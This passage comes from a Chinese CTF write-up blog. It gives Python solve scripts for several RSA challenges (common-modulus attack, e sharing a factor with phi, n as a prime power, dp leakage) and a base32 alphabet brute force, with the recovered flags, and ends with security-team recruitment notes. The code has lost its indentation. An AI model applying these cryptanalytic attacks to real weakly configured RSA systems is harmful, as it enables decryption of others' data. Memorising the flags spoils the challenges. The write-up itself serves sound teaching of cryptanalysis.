n = 114107341297408283801468814470303963122122556489590451040619457052827864984505912502462030175984161431709841571908269123131659496812467145870607611968843929870716066046232009282431653653484798819370087696248364531531706249180822839879862098012984590503284615395588919199545142177727328844260380842155437987767067800740569616584597507776426572206990858918111272636507821551592564540694671795374831548677720629329358177802890287837056940407030212276399942462042866947423728888561392653713356355778914658317507319575084393752755452971007289968044006561357799908892371839922838486713582082980752194204224263283004373
n1 = 21235204662158833223664424963408105101885570855652885953922511758363954474947609854216589644512813634294435585894296340005122907229365513346971631594453999584706013889403572150499529308966742992668850443386284277210686717652643585324255759216699733045642544284406720854291604837774882256435503827543483289606177965628162259184958789025311291796067574924595051311298594432767265114154138693108465671184854794167878031822162731921299518989845784744659944947091213703810190708463199067553747177712259911724424547999547534441790125049383068377243727588278432796727885216967953646999183906479537750330738956233695342750567
e1 = 13
c1 = 5640630966585093229374938575158853304507369792931959909038819773057666482368490365383634362421839045569190487785222799103423460816096797210546343809620912249021763787314569982909943181390882015170344954037813745251119237402775124991005154299085147091159741067430623420349690886728161235034687649593258746455165172528681627568611599473627285223154284756417744280966157271904828156564067870877521824545300153084830020169048653830385763172792698591998191641849931039720453035065355411394516308865955772746815765864888631258825704788352584540380169938419618543124830541663995097651872542381
e2 = 15
c2 = 5481001445755770090420425478456880914921441486935672376394423326451811448703288166341447356603281843336826624725965666634194700496514262129376916108926167953996689011980280761368893884042609095616407660087448963015169181749124738976578495911295096014725354350167650232970262765851074146687931181216305972147994236689422572940877763047930111954798962097847426932730342258169023809341164876019161104439561164839132092594444017039073155506935768658830659965630065643619399324102814118128802834719820426253836317043818687888302054465994498115387703382090351794495827905499417861507007863378916334790750453883661675063377
e = 65537
s,s1,s2 = gmpy2.gcdext(e1,e2)
m = (pow(c1,s1,n1) * pow(c2,s2,n1) % n1)
m2 = long_to_bytes(m)
factors = [11777892065426651999, 10100522426677320149, 16651625235320957803, 15616762946597906161, 17075632607344331131, 16946507762934111301, 13618885037077024279, 10040612110882504553, 16340211116882594287, 11964584391817142269, 17088379813205887661, 9281508366366115669, 14198042938738648387, 10436802938040427139, 9261040693807289549, 16880270107514803247, 10986943768724409089, 11502613740816749197, 9356350172425710359, 13428970346605599557, 10126802520926958821, 10270880245559150279, 9723861249937499279, 15622487550947237203, 15774106340553595249, 10621161426185076191,11718181938374860349 ,13498192768855092449 ,14147604789494386003 ,12712357180113548549 ,10203735303764112277 ,10635881647150245973]
phi_n = 1
for p in factors:
phi_n *= (p - 1)
d = mod_inverse(e, phi_n)
m = pow(c, d, n)
m1 = ''
while m > 0:
m, ascii_val = divmod(m, 256)
m1 = chr(ascii_val) + m1
m3 = m1 + m2.decode('utf-8')
print(m3)
#flag{05929ec9778ed739d94ee1a77b742714}[WEEK2]e?
模板一把梭
import gmpy2
import libnum
from Crypto.Util.number import *
p= 70724362259337647663584082414795381346569735601816096923682814277857463878289
q= 114427188167532721707398034034072867253267857672869034942206947096293901917007
e= 1314
c= 4308122681135507736058122041934864039713319497673888928736468819190185301630702240416683093700232966794026900978699666246019059398861283337865339404916304
n = p * q
phi = (p - 1) * (q - 1)
t = gmpy2.gcd(e,phi)
t1 = e // t
dt1 = gmpy2.invert(t1,phi)
mt1 = pow(c,dt1,n)
s,m = gmpy2.iroot(mt1,t)
print(long_to_bytes(s))
#flag{This_e_is_real_or_not}[WEEK2]factorizing_n
分解n
import gmpy2
import libnum
from Crypto.Util.number import *
n = 226515252384227990547287743140613580056836242860947832749754689048997071950972581790210817523352001702907675581567498443649554801433663166425134375454937126656357069687274036935331269594383360450823787099121079436459236734336130768046337169817940540921822023269188752420603975467384377614321048859304185067329741055517464271746238143742661897809442359331215501438861121047081117632626097939097519866099140569819965948998542652908170134545593659233229897003698175558888336706474178958535138595687148003367152624421106553412886263257022809480187410133186189435436294593588009551451899398811758511878324326255293307347560753524372663257044426744744426759970254203341706284024734042826158828749144322843934985927079504722440497388146240627249465363931951790326885478025237643
c = 52409805591744226507807531465616894934028463651864630447934395956954575834603756391651746535033902964658694070544877880970130028487381287088425209448038533705903737694267359561133766799228825599943891152463160326583722749586721691729062524310148743637505134465210906856660867852927837112666513674858029892207902196213784902541173835447263733760225682942461048573387925463479672527491229113710629340960375692432470493054415657845868577650170648157402682163577152288432313996310562452677399267755695644659367792066311336521698894993982901657735586844358679888210537898629281625526455444811591386493005341435516094660429968084363084301878446471676122069724608083578102382181382107225473535696274374370868301830807644939881080301668756603163431000745972823980427048672732291
e = 65537
p = 11776588228599764849559519654482976956833367474471407292255776713760090338489966385328569279135095351660161277221351884258247731394014018172166064062551483
phi = p ** 4 * (p - 1)
d = gmpy2.invert(e,phi)
m = pow(c,d,n)
print(long_to_bytes(m))
#flag{1f95f530f85b940db810fc917607ee22}[WEEK3]好好好!
dp + base32换表爆破
#求密文
import libnum
from Crypto.Util.number import *
import gmpy2
e=65537
dp=89183181604123417010894108474901628410408206538085478807758137668201829058797702838603939730356798163745078443656032825128645105954284119126609502005130005399692420386460970318283171848176434285488698019425286328269756591931253074416895028845240978211030365697435579850343911269163064228581083838914477473793
n=17133884272385326910236146208723169235592379139078245324256146697759098524213354087333170410075813764497353656874360657828668202585141557095326829141561993608634568037533128091918704136052835609732443342167341276983343070200953604216445186924411131823487594273213380078485528148801722039459601896275130691200206027353715109606722659553700867073796386669768748305283547862565020499794358571741903375812063001390288166187510171105241363677243530996160649133253643422391688399573703498726489248479978887237752214015456924632092625018668632234215462091314384917176427670194819828555385014264912614752917792278216214856001
c=7297673446200396117470312266735704951424121735299327785232249350567349180167473433806232931862684106388722088953786183522191592452252650217579986150373463901393038386627370305688040315665037164819432754099421229466379901436696822022518438390977543864543590936753547325597766614648063328562516667604171990354928485383191174966274941678597887943784661684719053108281896697098991347034225406718530599672101743303723470910913422462764406680309933367328977341637394665138995676573466380198978810546689819954949832833954061771415463198737542769848298258925680570823701939997224167603657418270886620562332895947413332492672
for i in range(1,e):
if(dp*e-1)%i==0:
if n%(((dp*e-1)//i)+1) == 0:
p = ((dp*e-1)//i)+1
q = n//p
phi = (p-1)*(q-1)
d= gmpy2.invert(e,phi)
print(long_to_bytes(pow(c,d,n)))
# 7U25DUJJ7USYATEN5SREOFFG5NY57FPS77U5DFPY54JEG3NYKWSYA3YD5CXYTTNW53QS====
————————————————————————————————————————————————————————————————————————————————————————————————————————————
#求码表缺少字符
a = '234567ABCDEFGHIJKLMNOPQRSTUVWXYZ='
b = 'EGKMAPZ3TISLXYHWB4R6CQV'
for i in a:
if i not in b:
print(i,end='')
# 257DFJNOU=
————————————————————————————————————————————————————————————————————————————————————————————————————————————
#爆破flag
import base64
str1 = '7U25DUJJ7USYATEN5SREOFFG5NY57FPS77U5DFPY54JEG3NYKWSYA3YD5CXYTTNW53QS===='
flag = ''
a = '257DFJNOU='
for q in a:
for w in a:
for e in a:
for r in a:
for t in a:
for y in a:
for i in a:
for o in a:
for p in a:
b = q + w + e + 'EGK' + r + 'MAPZ' + t + y + '3TISLXYHW' + i + 'B4' + o + 'R' + p + '6CQV'
string2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567"
c = str1.translate(str.maketrans(b,string2))
d = base64.b32decode(c)
if b'flag{' in d:
print(d)
#flag{fa48a440-d0ff-0c2a-366243-a46b7e7853}Blockchain
入门推荐:b站搜Snowy雪殇
[WEEK2]blockchain signin
跟着视频一步步做即可
友情提醒
EXP的格式是个人习惯!EXP的格式是个人习惯!EXP的格式是个人习惯!重要事情所三遍QAQ
学习推荐只是个人学习时看的视频和资料,另外也有很多优秀的师傅的博客可以去看看。
pwn week2和3就比较偷懒啦,题目太多了,脑子都快溢出了T^T
星盟安全团队招新
微信公众号搜星盟安全
纳新群号
222328705(一群)
346014666(二群)
904749403(b站公开课群)
欢迎各位师傅入群交流
最新评论